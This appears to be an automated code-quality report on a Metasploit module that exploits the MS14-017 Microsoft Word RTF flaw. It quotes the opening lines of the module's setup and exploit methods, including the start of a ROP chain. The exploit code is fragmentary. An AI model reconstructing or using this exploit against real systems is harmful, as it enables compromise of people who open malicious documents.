modules/exploits/windows/fileformat/ms14_017_rtf.rb
Method initialize
has 49 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => "MS14-017 Microsoft Word RTF Object Confusion",
'Description' => %q{
This module creates a malicious RTF file that when opened in
Method exploit
has 48 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
junk = rand(0xffffffff)
rop_chain = [
0x275de6ae, # ADD ESP,0C # RETN [MSCOMCTL.ocx]
junk,